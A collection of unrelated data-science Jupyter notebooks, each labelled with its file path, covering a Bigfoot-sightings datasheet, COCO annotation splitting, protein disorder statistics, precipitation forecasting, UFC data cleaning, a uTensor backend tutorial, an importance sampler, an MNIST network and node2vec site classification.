# ### Are there any known errors, sources of noise, or redundancies in the data?
# None are known.
# ## Data Processing
# ### What processing/cleaning was done?
# Minimal cleaning was done to remove invalid time and date entries.
# Each report instance was concatenated with associated weather conditions via the Dark Sky API.
#
# ### Was the “raw” data saved in addition to the preprocessed/cleaned data?
# Yes. Original scrape can be found here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Is the preprocessing software available?
# All of the code used in scraping and preprocessing is available here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Does this dataset collection/processing procedure achieve the motivation for creating the dataset stated in the first section of this datasheet?
# Yes.
# ## Data Distribution
# ### How is the dataset distributed?
# It is distributed via data.world at the following link: https://data.world/timothyrenner/bfro-sightings-data/workspace/file?filename=bfro_reports_geocoded.csv
#
# ### When will the dataset be released/first distributed?
# The dataset has been released and distributed.
#
# ### What license (if any) is it distributed under?
# MIT License - A short and simple permissive license with conditions only requiring preservation of copyright and license notices. Licensed works, modifications, and larger works may be distributed under different terms and without source code.
#
# ### Are there any fees or access/export restrictions?
# None.
# ## Data Maintenance
# ### Who is supporting/hosting/maintaining the dataset?
# The original creator of the dataset, <NAME>.
#
# ### Will the dataset be updated?
# The dataset was last updated 12/2/17 and will be updated at the will of the original creator.
#
# ### If the dataset becomes obsolete how will this be communicated?
# This is unclear. It may either be communicated by the creator of the dataset, or by the BFRO.
#
# ### Is there a repository link to any/all papers/systems that use this dataset?
# https://github.com/timothyrenner/bfro_sightings_data
#
# ### If others want to extend/augment/build on this dataset, is there a mechanism for them to do so?
# Because the code for pulling the data was made available on github, others may use it to replicate/extend or build on the dataset.
#
# ## Legal & Ethical Considerations
#
# ### If the dataset relates to people or was generated by people, were they informed about the data collection?
# The dataset was created by people who were voluntarily submitting their data to be collected into a common database.
#
# ### If it relates to other ethically protected subjects, have appropriate obligations been met?
# It is unclear if Bigfoot himself is aware that this data is being collected about him ;)
#
# ### If it relates to people, were there any ethical review applications/reviews/approvals?
# None.
#
# ### If it relates to people, were they told what the dataset would be used for and did they consent? What community norms exist for data collected from human communications?
# Because the data in the BFRO database is publicly available, people who contributed to it may not be aware of all uses of the dataset. However, it is implied that they consent to uses of the data because they volunteered the information in pursuit of data collection and analysis being done regarding Bigfoot.
#
# ### If it relates to people, could this dataset expose people to harm or legal action?
# No personal information is collected (i.e. name, address etc.) aside from what is volunteered in the text report. Therefore, it is very unlikely that the data set could expose people to harm.
#
# ### If it relates to people, dies it unfairly advantage or disadvantage a particular social group?
# No.
#
# ### If it relates to people, were they provided with privacy guarantees?
# No privacy guarantees were made, but people were not required to submit any personal information.
#
# ### Does the dataset comply with the EU General Data Protection Regulation (GDPR)?
# The data only comes from North America, so GDPR does not apply.
# Does the dataset contain information that might be considered sensitive or confidential?
# The dataset does not contain any personally identifying information.
#
# ### Does the dataset contain information that might be considered inappropriate or offensive?
# Information contained within the full-text reports of Bigfoot sightings may contain profanity or be considered inappropriate/offensive because it was submitted by individuals and not censored.
| jnovak01/datasheet.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
import os
import sys
from pycocotools.coco import COCO
from tqdm import tnrange, tqdm_notebook
import copy
class DatasetSplitter():
"""
Parameters:
- annotations_file:
"""
def __init__(self, annotations_file, annotations_output_dir, categories_list, boundaries_list):
# Preliminary error checking
assert os.path.isfile(os.getcwd() + "/" + annotations_file), "Annotations file at path {} does not exist".format(annotations_file)
assert os.path.isdir(os.getcwd() + "/" + annotations_output_dir), "Annotations output dir at path {} does not exist".format(annotations_output_dir)
assert categories_list is not None, "Categories list must be populated"
assert boundaries_list is not None, "Boundaries list must be populated"
assert len(categories_list) == len(boundaries_list), "Boundary list must be the same size as the categories list"
# Assigning variables
self.coco_json = COCO(annotations_file)
self.annotations_output_dir = annotations_output_dir
self.categories_list = categories_list
self.boundaries_list = boundaries_list
# Get image IDs for all images in dataset
self.imgIds = self.coco_json.getImgIds()
self.images = self.coco_json.loadImgs(ids = self.imgIds)
def splitDataset(self):
# Make coco json master list
split_coco_json = {
"images": [],
"annotations": [],
"categories": self.categories_list
}
# Add images to image list
for image in self.images:
split_coco_json["images"].append(image)
# Process each annotation in each image
for x in tnrange(len(self.imgIds), desc = 'Processing image annotations...'):
# Get annotation IDs pertaining to image
annIds = self.coco_json.getAnnIds(imgIds = self.imgIds[x])
# Get all annotations pertaining to image
annotations = self.coco_json.loadAnns(ids = annIds)
for annotation in annotations:
# Make a copy of boundaries list
temp_list = copy.deepcopy(self.boundaries_list)
# Add area to temp list, then sort and find index of area
temp_list.append(annotation["area"])
sorted_list = sorted(temp_list)
index = sorted_list.index(annotation["area"]) + 1
# Change category id to index and add to split coco json master dictionary
annotation["category_id"] = index
split_coco_json["annotations"].append(annotation)
with open(self.annotations_output_dir + "/annotations_split.json", "w") as outfile:
json.dump(split_coco_json, outfile)
print("Saved annotations file to {}".format(self.annotations_output_dir))
# +
categories_list = [
# Area 166 - 50,000
{
"id": 1,
"name": "Small Structure",
"supercategory": "Structure"
},
# Area 50,001 - 200,000
{
"id": 2,
"name": "Medium Structure",
"supercategory": "Structure"
},
# Area 200,001 and above
{
"id": 3,
"name": "Other",
"supercategory": "Structure"
}
]
dataset_splitter = DatasetSplitter( annotations_file = "datasets/Downtown_Sliced/test/annotations.json",
annotations_output_dir = "datasets/Downtown_Sliced/test",
categories_list = categories_list,
boundaries_list = [50000, 200000, 900000])
# -
dataset_splitter.splitDataset()
| tools/SplitDatasetByArea.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.12 64-bit (''base'': conda)'
# name: python3
# ---
# # Pairwise disorder comparison between effectors and reference proteomes - IUpred 1.0 *short*
# +
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import glob
import seaborn as sns
from scipy.stats import mannwhitneyu
import sys
sys.path.append('../src/')
import aepathdisorder as aepd
# %matplotlib inline
# +
# Load maps
bug_map = aepd.load_map('../data/maps/reference_taxa.json')
CR_map = aepd.load_map('../data/maps/CR_taxa.json')
EHEC_map = aepd.load_map('../data/maps/EHEC_taxa.json')
EPEC_map = aepd.load_map('../data/maps/EPEC_taxa.json')
# Load iupred results
bug_iupred = glob.glob('../data/iupred_agg-clas/proteomes/*/*short*.table')
EHEC_iupred = glob.glob('../data/iupred_agg-clas/EHEC_effectors/*short*.table')
EPEC_iupred = glob.glob('../data/iupred_agg-clas/EPEC_effectors/*short*.table')
CR_iupred = glob.glob('../data/iupred_agg-clas/CR_effectors/*short*.table')
# +
#human_df = concatenate_results(human_iupred)
bug_df = aepd.concatenate_results(bug_iupred)
EHEC_df = aepd.concatenate_results(EHEC_iupred)
EPEC_df = aepd.concatenate_results(EPEC_iupred)
CR_df = aepd.concatenate_results(CR_iupred)
effector_types = ['EHEC', 'EPEC', 'CR']
effector_dfs = [EHEC_df, EPEC_df, CR_df]
effector_maps = [EHEC_map, EPEC_map, CR_map]
for df, mapdict in zip(effector_dfs, effector_maps):
#df.drop(['dataset'], axis=1, inplace=True)
df['dataset'] = df['protein_ac'].map(mapdict)
df['collection_type'] = 'Effector'
for df, effector_type in zip(effector_dfs, effector_types):
df['effector_type'] = effector_type
# Make bug taxa strings (stored as int)
bug_df['dataset'] = bug_df['dataset'].astype(str)
# Define references as such
bug_df['collection_type'] = 'Reference'
merged_effector_df = pd.concat(effector_dfs)
# +
bug_efftype_map = {}
for k, v in bug_map.items():
bug_efftype_map[k] = v['type']
bug_efftype_map
# +
effector_taxa = set(merged_effector_df['dataset'])
reference_taxa = set(bug_df['dataset'])
paired_taxa = effector_taxa & reference_taxa
paired_effectors = merged_effector_df[merged_effector_df['dataset'].isin(paired_taxa)]
paired_bugs = bug_df[bug_df['dataset'].isin(paired_taxa)]
# -
paired_bugs['effector_type'] = paired_bugs['dataset'].map(bug_efftype_map)
final_df = pd.concat([paired_effectors, paired_bugs], ignore_index=True)
final_df.reset_index(inplace=True)
# Drop effectors from Reference collections
final_df = final_df.sort_values(by='collection_type').drop_duplicates(subset='protein_ac')
len(final_df)
# +
sns.catplot(
x='effector_type',
y='disorder_fraction',
hue='collection_type',
data=final_df,
kind='violin',
cut=0)
plt.savefig('../figures/pairwise_iupred-short.png',
dpi=300)
# + tags=[]
mwu_stat_df = aepd.calc_mannwithney(final_df)
mwu_stat_df.to_csv('../data/iupred_agg-clas/mannwithney_iupred-short.tsv', sep='\t', index_label='Effector collection')
mwu_stat_df
# -
ks_stat_df = aepd.calc_kolmogorovsmirnov(final_df)
ks_stat_df.to_csv('../data/iupred_agg-clas/kolmogorovsmirnov_iupred-short.tsv', sep='\t', index_label='Effector collection')
ks_stat_df
| notebooks/disorder_pairwise_comparison_iupred_short.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: py38
# language: python
# name: py38
# ---
# # 1. File I/O Settings
# +
hindcast_data_file = 'test_data/NMME_data_BD.csv' #data used for cross-validated hindcast skill analysis, and to train forecast model
hindcast_has_years = Truehindcast_has_header = False
hindcast_has_obs = True #NOTE: This is mandatory
hindcast_export_file = 'bd.csv' #'None' or the name of a file to save cross validated hindcasts
forecast_data_file = 'test_data/NMME_data_BD_forecast.csv' #data fed to trained model to produce forecasts, or None
forecast_has_years = True
forecast_has_header = False
forecast_has_obs = True #NOTE: for Forecasting, observations are optional
forecast_export_file = 'bd_rtf.csv'
variable = 'Precipitation (mm/day)'
# -
# # 2. Cross-Validated Hindcast Skill Evaluation
# #### 2a. Analysis Settings
mme_methodologies = ['EM', 'MLR', 'ELM'] #list of MME methodologies to use
skill_metrics = [ 'MAE', 'IOA', 'MSE', 'RMSE', 'PearsonCoef', 'SpearmanCoef'] #list of metrics to compute - available: ['SpearmanCoef', 'SpearmanP', 'PearsonCoef', 'PearsonP', 'MSE', 'MAE', 'RMSE', 'IOA']
# #### 2b. Model Parameters
args = {
#EnsembleMean settings
'em_xval_window': 1, #odd number - behavior undefined for even number
#MLR Settings
'mlr_fit_intercept': True, #Whether to calculate the intercept for this model. If set to False, no intercept will be used in calculations (i.e. data is expected to be centered) (https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html)
'mlr_xval_window': 1, #odd number - behavior undefined for even number
'mlr_standardization': None, #'std_anomaly' or None
#ELM Settings
'elm_xval_window': 1, #odd number - behavior undefined for even number
'elm_hidden_layer_neurons':10, #number of hidden layer neurons - overridden if using PCA init
'elm_activation': 'sigm', #“lin” for linear, “sigm” or “tanh” for non-linear, “rbf_l1”, “rbf_l2” or “rbf_linf” for radial basis function neurons (https://hpelm.readthedocs.io/en/latest/api/elm.html)
'elm_standardization' : 'minmax', #'minmax' or 'std_anomaly' or None
'elm_minmax_range': [-1, 1] #choose [minimum, maximum] values for minmax scaling. ignored if not using minmax scaling
}
# #### 2c. Model Construction - Do Not Edit
# +
from pyelmmme import *
reader = Reader() #Object that will handle our input data
data = reader.read_txt(hindcast_data_file, has_years=hindcast_has_years, has_obs=hindcast_has_obs, has_header=hindcast_has_header)
mme = MME(data)
mme.train_mmes(mme_methodologies, args)
mme.measure_skill(skill_metrics)
# -
# #### 2d. Cross-Validated Hindcast Timeline - Do Not Edit
ptr = Plotter(mme)
ptr.timeline(methods=mme_methodologies, members=False, obs=True, var=variable)
# #### 2e. Cross-Validated Hindcast Skill Metrics & Distributions - Do Not Edit
ptr.skill_matrix(methods=mme_methodologies, metrics=skill_metrics, obs=True, members=True)
ptr.box_plot(methods=mme_methodologies, obs=True, members=False, var=variable)
# #### 2f. Saving MME & Exporting Cross-Validated Hindcasts - Do Not Edit
mme.export_csv(hindcast_export_file)
# # 3. Real Time Forecasting
# #### 3a. RTF Settings
forecast_methodologies = ['EM', 'MLR', 'ELM' ]
# #### 3b. Computation - do not edit
fcst_data = reader.read_txt(forecast_data_file, has_years=forecast_has_years, has_obs=forecast_has_obs)
mme.add_forecast(fcst_data)
mme.train_rtf_models(forecast_methodologies, args)
mme.make_RTFs(forecast_methodologies)
ptr.bar_plot(methods=mme_methodologies, members=False, obs=forecast_has_obs, var=variable)
mme.export_csv(forecast_export_file, fcst='forecasts', obs=forecast_has_obs)
| pyelmmme/PyELM-MME-1D.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.10 ('ufc_events_eda')
# language: python
# name: python3
# ---
# # Process UFC events/fights dataset
#
# %load_ext nb_black
# %load_ext autoreload
# %autoreload 2
import ufc_events_eda.utils.paths as path
import pandas as pd
import numpy as np
from ufc_events_eda.data.parse_json import parse_json
# ### Read dataset into dataframe
#
df = parse_json(path.data_raw_dir("ufc_events.json"))
df.head()
# ### Print shape, columns and data types
#
# Check references/columns.md to see what each column represents in detail
#
print(df.shape)
print(df.columns)
df.dtypes
# ### Convert numeric strings to float or int
#
num_columns = [
"fighter_1_kd",
"fighter_2_kd",
"fighter_1_str",
"fighter_2_str",
"fighter_1_td",
"fighter_2_td",
"fighter_1_sub",
"fighter_2_sub",
"round",
]
df[num_columns] = df[num_columns].apply(
pd.to_numeric, errors="coerce", downcast="unsigned"
)
df[num_columns].dtypes
# ### Separate fights from events (keeping event name in fights dataframe)
#
df_events = df.drop_duplicates(subset=["event_name"])[
["event_name", "event_date", "event_location"]
]
df_fights = df.drop(columns=["event_location", "event_date"])
# ### Cast event_date to datetime
#
df_events["event_date"] = pd.to_datetime(df["event_date"], format="%B %d, %Y")
# ### Fix inconsistent location entries
#
def fix_inconsistent_location(df):
city_patterns = [
(
df["event_location"].str.contains("Abu Dhabi", case=False),
"Abu Dhabi, United Arab Emirates",
),
(
df["event_location"].str.contains("Sao Paulo", case=False),
"Sao Paulo, Brazil",
),
(
df["event_location"].str.contains("Rio de Janeiro", case=False),
"Rio de Janeiro, Brazil",
),
(
df["event_location"].str.contains("Berlin", case=False),
"Berlin, Germany",
),
(
df["event_location"].str.contains("Saitama", case=False),
"Saitama, Japan",
),
]
city_criteria, city_values = zip(*city_patterns)
df["event_location_normalized"] = np.select(city_criteria, city_values, None)
# Replace "None" values with original position
df["event_location_normalized"] = df["event_location_normalized"].combine_first(
df["event_location"]
)
df["event_location"] = df["event_location_normalized"]
return df.drop(columns=["event_location_normalized"])
df_events = fix_inconsistent_location(df_events)
# ### Geocode cities to have latitude and longitude for event_location
#
# %%capture
# %run -i '../ufc_events_eda/data/geocode.py'
df_city = pd.read_parquet(path.data_interim_dir("cities.parquet"))
df_events_merged = pd.merge(
df_events, df_city, how="left", on="event_location"
).drop_duplicates(subset="event_name")
# ### Check null values
#
df_fights.isna().sum()
# We can see there are 3217 fights that do not have method_detail. Also, there are 21 fights that do not have strikes, knockdowns, takedowns and submissions data. Let's see if we should keep those fights in the dataset.
#
df_fights[df_fights["fighter_1_kd"].isna()]
# Although we have no data of what happened **during** those fights, there is data of how they ended, where they took place, etc. Therefore, I keep those 21 fights in the dataset.
#
# ### Save processed data to parquet files
#
df_events_merged.to_parquet(path.data_processed_dir("events_processed.parquet"))
df_fights.to_parquet(path.data_processed_dir("fights_processed.parquet"))
| notebooks/1-cvillafraz-data-processing.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# Required: pip install neatdata
from neatdata.neatdata import *
df = pd.read_csv("train.csv") # Edit: Your dataset
from sklearn.model_selection import train_test_split
className = 'class' # Edit: Replace class with the Y column name
trainX, testX, trainY, testY = train_test_split(df.drop([className], axis=1),
df[className], train_size=0.75, test_size=0.25)
indexColumns = [] # Edit: Optionally add column names
# Automatic data cleaning will ignore the following columns:
iWillManuallyCleanColumns = [] # Edit: Optionally add column names.
# neatdata API:
neatdata = NeatData()
cleanTrainX, cleanTrainY = neatdata.cleanTrainingDataset(trainX, trainY, indexColumns, iWillManuallyCleanColumns)
cleanTestX = neatdata.cleanTestDataset(testX)
# If Y is a string, this command makes them numeric:
cleanTestY = neatdata.convertYToNumbersForModeling(testY)
# This will convert Y values back to strings if necessary
# results = neatData.convertYToStringsOrNumbersForPresentation(self.results)
| Hello Neatdata.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: utensor
# language: python
# name: utensor
# ---
# ## Write a Simple Backend
#
# 1. All backend should overwrite:
# - a class attribute `TARGET`: this is the target name of your backend
# - `default_config` class property
# - `apply` method, which is responsible for generating files or anything you want with the given `ugraph`
# ### The `Backend` interface
#
# 1. the class attribute `TARGET` should be overwriten and be of type `str`.
# - the value of `TARGET` should be unique or `ValueError` will be raised
# 2. one should overwrite the `default_config` class property
# 3. the first argument of `__init__` should be the config dictionary
# - this dictionary can be generated via a toml file (recommended)
# - this dictionary should be of the same format as the value returned by `default_config` class property
#
# Here is a simple example:
# +
from utensor_cgen.backend import Backend
from utensor_cgen.utils import class_property
class DummyBackend(Backend):
TARGET = 'dummy-backend'
def __init__(self, config):
self.output_file = self.config[self.TARGET][self.COMPONENT]['output-file']
def apply(self, ugraph):
print('generating {}'.format(self.output_file), )
with open(self.output_file, 'w') as fid:
fid.write('#include <stdio.h>\n\n')
fid.write('int main(int argc, char* argv[]) {\n')
fid.write(' printf("graph name: {}\\n");\n'.format(ugraph.name))
fid.write(' printf("ops in topological sorted order:\\n");\n')
for op_name in ugraph.topo_order:
fid.write(' printf(" {}\\n");\n'.format(op_name))
fid.write(' return 0;\n}')
@class_property
def default_config(cls):
"""this default_config property will define the format of `config` value
passed to `__init__`
You should initialize your backend instance accordingly
"""
return {
cls.TARGET: {
cls.COMPONENT: {
'output-file': 'list_op.c'
}
}
}
# -
print(DummyBackend.TARGET, DummyBackend.COMPONENT)
# Basically, this dummy backend takes a graph and generate a `.c` file which will print out all the operators in the graph.
# ## Backend Registration
#
# Once you create a `Backend`, you can registrate it via `BackendManager` as following:
# +
from utensor_cgen.backend import BackendManager
BackendManager.register(DummyBackend)
# -
# ## Read a Graph and Apply the Backend
from utensor_cgen.frontend import FrontendSelector
ugraph = FrontendSelector.parse('models/cifar10_cnn.pb', output_nodes=['pred'])
BackendManager.get_backend(DummyBackend.TARGET)({
DummyBackend.TARGET: {
'backend': {
'output-file': 'list_mymodel_ops.cpp'
}
}
}).apply(ugraph)
# !cat list_mymodel_ops.cpp
#
| tutorials/component_registration/backend_registration.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: achint-env2
# language: python
# name: achint-env2
# ---
import torch
import numpy as np
_device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.stats import multivariate_normal as mv
import matplotlib.pyplot as plt
# +
# n_IW_samples =10
# m1 = 2
# m2 = 5
# var=5
# x,y= sample_proposal(m1, m2, var, n_IW_samples)
# +
# x = torch.ones(64,32)
# y = torch.ones(10,32)
# (x@<EMAIL>).size()
# +
## Input G , mu1, var1, mu2, var2
## Output: z,W, KL
# -
class importance_sampler():
def __init__(self, latent_dim1, latent_dim2, batch_size):
self.latent_dim1 = latent_dim1
self.latent_dim2 = latent_dim2
self.batch_size = batch_size
def sample_proposal(self,var, n_IW_samples, device=_device):
mn1 = torch.distributions.MultivariateNormal(torch.zeros(self.latent_dim1), var * torch.eye(self.latent_dim1))
mn2 = torch.distributions.MultivariateNormal(torch.zeros(self.latent_dim2), var * torch.eye(self.latent_dim2))
return [mn1.sample([n_IW_samples,self.batch_size]).to(device), mn2.sample([n_IW_samples,self.batch_size]).to(device)]
def proposal_dist(self,z1,z2,proposal_var):
# dim = self.latent_dim1+self.latent_dim2
z_sqd = -(z1**2).sum(-1)-(z2**2).sum(-1)
log_p_x = z_sqd/proposal_var
# p_x = 1/(2*np.pi*var)**(dim/2)*torch.exp(z_sqd/var)
return log_p_x
def target_dist(self,G,z1,z2,mu1,var1,mu2,var2):
# mu1: [batch_size,latent_dim1], z1: [n_IW_samples,latent_dim1]
g11 = G[:self.latent_dim1,:self.latent_dim2] #[latent_dim1, latent_dim2]
g12 = G[:self.latent_dim1,self.latent_dim2:] #[latent_dim1, latent_dim2]
g21 = G[self.latent_dim1:,:self.latent_dim2] #[latent_dim1, latent_dim2]
g22 = G[self.latent_dim1:,self.latent_dim2:] #[latent_dim1, latent_dim2]
z_sqd = -(z1**2).sum(-1)-(z2**2).sum(-1) #[n_IW_samples,batch_size]
h1 = (z1@g11*z2).sum(-1)
h2 = (z1@g12*(z2**2)).sum(-1)
h3 = ((z1**2)@g21*z2).sum(-1)
h4 = ((z1**2)@g22*(z2**2)).sum(-1)
h = h1+h2+h3+h4 #[n_IW_samples, batch_size]
d1 = (mu1*z1+var1*(z1**2)).sum(-1)
d2 = (mu2*z2+var2*(z2**2)).sum(-1)
d = d1 + d2 #[n_IW_samples, batch_size]
log_t_x = (z_sqd+h+d) #[n_IW_samples, batch_size]
return log_t_x
def calc(self,G,mu1,var1,mu2,var2,n_IW_samples):
proposal_var = 1
z1_prior, z2_prior = self.sample_proposal(proposal_var,n_IW_samples) #[n_IW_samples,batch_size,latent_dim1],[n_IW_samples,batch_size,latent_dim2]
print(z1_prior.size())
z1_posterior,z2_posterior = self.sample_proposal(proposal_var,n_IW_samples)#[n_IW_samples,batch_size,latent_dim1],[n_IW_samples,batch_size,latent_dim2]
t_x_prior = self.target_dist(G,z1_prior, z2_prior,torch.zeros_like(mu1),torch.zeros_like(var1),torch.zeros_like(mu2),torch.zeros_like(var2))
t_x_post = self.target_dist(G,z1_posterior, z2_posterior,mu1,var1,mu2,var2)
p_x_prior = self.proposal_dist(z1_prior,z2_prior,proposal_var)
p_x_post = self.proposal_dist(z1_posterior,z2_posterior,proposal_var) #[batch_size,n_IW_samples]
IS_weights_prior = t_x_prior - p_x_prior
prior_normalization = (torch.logsumexp(IS_weights_prior,1)).unsqueeze(1)
IS_weights_prior = torch.exp(IS_weights_prior - prior_normalization)
IS_weights_post = t_x_post - p_x_post
posterior_normalization = (torch.logsumexp(IS_weights_post,1)).unsqueeze(1)
IS_weights_post = torch.exp(IS_weights_post - posterior_normalization)
return z1_prior,z2_prior,z1_posterior,z2_posterior, IS_weights_prior,IS_weights_post
# +
# x = torch.randn(15)
# x = x.repeat(10, 1)
# x.size()
# -
| 2D_2D_Gaussian_with_IS/importance_sampler_poise.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as inputData
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import confusion_matrix
data = inputData.read_data_sets('data', one_hot=True)
def plotNumbers(imset, valset, dimen):
fig, axis = plt.subplots(dimen[0],dimen[1])
for pos, sub in enumerate(axis.flat):
sub.imshow(imset[pos].reshape((28,28)))
sub.set_xticks([])
sub.set_yticks([])
sub.set_xlabel('pred:%r' %valset[pos])
plt.show()
# +
num_of_epochs=400
batch_size = 100
accu_list = []
epoch_size = int(len(data.train.labels)/batch_size)
#L1:200, L2:100, L3:60, L4:30, L5:10
X = tf.placeholder(tf.float32, shape=[None, 784])
Y_ori = tf.placeholder(tf.float32, shape=[None, 10])
W1 = tf.Variable(initial_value=tf.truncated_normal([784, 200], stddev=0.1))
W2 = tf.Variable(initial_value=tf.truncated_normal([200, 100], stddev=0.1))
W3 = tf.Variable(initial_value=tf.truncated_normal([100, 60], stddev=0.1))
W4 = tf.Variable(initial_value=tf.truncated_normal([60, 30], stddev=0.1))
W5 = tf.Variable(initial_value=tf.truncated_normal([30, 10], stddev=0.1))
b1 = tf.Variable(initial_value=tf.zeros(200))
b2 = tf.Variable(initial_value=tf.zeros(100))
b3 = tf.Variable(initial_value=tf.zeros(60))
b4 = tf.Variable(initial_value=tf.zeros(30))
b5 = tf.Variable(initial_value=tf.zeros(10))
af1 = tf.matmul(X, W1) + b1
Y1 = tf.nn.sigmoid(af1)
af2 = tf.matmul(Y1, W2) + b2
Y2 = tf.nn.sigmoid(af2)
af3 = tf.matmul(Y2, W3) + b3
Y3 = tf.nn.sigmoid(af3)
af4 = tf.matmul(Y3, W4) + b4
Y4 = tf.nn.sigmoid(af4)
af5 = tf.matmul(Y4, W5) + b5
Y_pred = tf.nn.softmax(af5)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=af5, labels=Y_ori)
cost = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(0.009)
trainer = optimizer.minimize(cost)
correct_prediction = tf.equal(tf.argmax(Y_ori, axis=1), tf.argmax(Y_pred, axis=1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for val in range(epoch_size*num_of_epochs):
train_batch_x, train_batch_y = data.train.next_batch(batch_size)
sess.run(trainer, feed_dict={X: train_batch_x, Y_ori: train_batch_y})
if (val/epoch_size)%5==0:
accu_list.append(sess.run(accuracy, feed_dict={X: data.test.images, Y_ori: data.test.labels}))
print(accu_list)
# -
xVal = np.arange(10,num_of_epochs+5,5)
plt.plot(xVal, accu_list[1:])
plt.show()
# +
prediction = tf.argmax(Y_pred, axis=1)
predict_bool = sess.run(correct_prediction, feed_dict={X: data.test.images, Y_ori: data.test.labels})
predict_bool_inv = [not val for val in predict_bool]
failed_images = data.test.images[predict_bool_inv]
failed_pred = sess.run(prediction, feed_dict={X:failed_images})
plotNumbers(failed_images[200:218], failed_pred[200:218], dimen=(3,6))
len(failed_images)
# +
successful_images = data.test.images[predict_bool]
successful_pred = sess.run(prediction, feed_dict={X:successful_images})
plotNumbers(successful_images[0:18], successful_pred[0:18], dimen=(3,6))
# +
test_pred = sess.run(prediction, feed_dict={X: data.test.images})
test_true = data.test.labels.argmax(axis=1)
confu_matri = confusion_matrix(test_true, test_pred)
print(confu_matri)
# +
#assign weight with truncated_normal()
# AdamOptimizer instead of GradientDescentOptimizer
# +
#epoch: 75
[0.0892, 0.9673, 0.9761, 0.9753, 0.9749, 0.9776, 0.9779, 0.9756, 0.973, 0.9753, 0.9769, 0.975, 0.976, 0.9751, 0.9743]
#epoch: 20, without *100
[0.1032, 0.9706, 0.9727, 0.9757]
#with gradient descent
[0.1028, 0.1135, 0.1135, 0.1135]
#wtih weights initialized as zero
[0.0958, 0.2801, 0.3346, 0.3598]
| 2.tensor_mnist_five_layer_sigmoid.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.6.10 64-bit (''site_similarity'': conda)'
# name: python361064bitsitesimilarityconda5cc228f1d50144ce9681545e76d7f6e7
# ---
import sys,os
sys.path.append("/home/paco/Documents/site_similarity")
from utils.notebook_utils import load_level_data, create_nodes, create_graph, draw_graph
# + tags=[]
lvl_one = load_level_data(level=1)
# -
lvl_one_nodes = create_nodes(lvl_one)
lvl_one_nodes[:10]
[(k, v) for k, v in lvl_one_nodes if k == 'politicalmayhem.news']
# +
from stellargraph import StellarGraph
import pandas as pd
lvl_one_graph = StellarGraph(edges=pd.DataFrame(lvl_one_nodes, columns=['source', 'target']))
# + tags=[]
from stellargraph.data import BiasedRandomWalk
rw = BiasedRandomWalk(lvl_one_graph)
walks = rw.run(
nodes=list(lvl_one_graph.nodes()), # root nodes
length=100, # maximum length of a random walk
n=10, # number of random walks per root node
p=0.5, # Defines (unormalised) probability, 1/p, of returning to source node
q=2.0, # Defines (unormalised) probability, 1/q, for moving away from source node
)
print("Number of random walks: {}".format(len(walks)))
# +
from gensim.models import Word2Vec
str_walks = [[str(n) for n in walk] for walk in walks]
model = Word2Vec(str_walks, size=128, window=5, min_count=0, sg=1, workers=2, iter=1)
model.save("node2vec_lvl_one_new_data.model")
# -
model.wv['villagevoice.com'].shape
# + tags=[]
from dataprep.load_annotated_data import apply_splits
from utils.notebook_utils import load_corpus
from modelling.baselines import eval_model
DATA = load_corpus('modified_corpus.csv')
SPLITS = apply_splits(DATA)
print(SPLITS.keys())
train = pd.DataFrame(SPLITS['train-0'])
test = pd.DataFrame(SPLITS['test-0'])
# +
X_train = train.apply(lambda x: model.wv[x['source_url_processed']], axis=1)
y_train = train.apply(lambda x: x['fact'], axis=1)
# +
X_test = test.apply(lambda x: model.wv[x['source_url_processed']], axis=1)
y_test = test.apply(lambda x: x['fact'], axis=1)
# + tags=[]
from sklearn.linear_model import LogisticRegressionCV
from sklearn.metrics import accuracy_score
clf = LogisticRegressionCV(
Cs=10, cv=10, scoring="accuracy", verbose=True, multi_class="ovr", max_iter=300
)
clf.fit(X_train.values.tolist(), y_train.values.tolist())
# +
y_pred = clf.predict(X_test.values.tolist())
accuracy_score(y_test, y_pred)
# +
from sklearn.ensemble import GradientBoostingClassifier
clf = GradientBoostingClassifier(random_state=42)
# -
clf.fit(X_train.tolist(), y_train.tolist())
tree_predict = clf.predict(X_test.tolist())
accuracy_score(y_test, tree_predict)
# +
from sklearn import svm
svm_clf = svm.SVC(decision_function_shape='ovo')
svm_clf.fit(X_train.tolist(), y_train.tolist())
# -
svm_predict = svm_clf.predict(X_test.tolist())
accuracy_score(y_test, svm_predict)
lin_clf = svm.LinearSVC() # one-vs-rest
lin_clf.fit(X_train.tolist(), y_train.tolist())
